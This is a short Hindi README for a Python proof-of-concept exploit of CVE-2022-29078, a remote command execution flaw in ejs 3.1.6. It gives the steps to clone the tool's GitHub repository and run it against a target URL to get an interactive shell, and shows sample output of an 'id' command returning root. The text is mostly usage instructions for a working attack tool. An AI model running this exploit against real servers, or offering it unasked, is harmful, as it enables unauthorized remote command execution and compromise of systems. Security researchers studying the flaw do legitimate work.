
CVE-2022-29078 (ejs 3.1.6) के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट जो Python स्क्रिप्ट के माध्यम से दूरस्थ कमांड निष्पादन सक्षम करता है। लक्ष्य URL स्वीकार करता है और एक इंटरैक्टिव शेल प्रदान करता है।
CVE-2022-29078 के लिए सरल PoC (कमजोर ejs 3.1.6)
git clone https://github.com/chuckdu21/CVE-2022-29078.git
cd CVE-2022-29078
python3 CVE-2022-29078.py <URL>
कमांड निष्पादित करने के लिए एक प्रॉम्प्ट दिखाई देगा
$ id
uid=0(root) gid=0(root) groupes=0(root)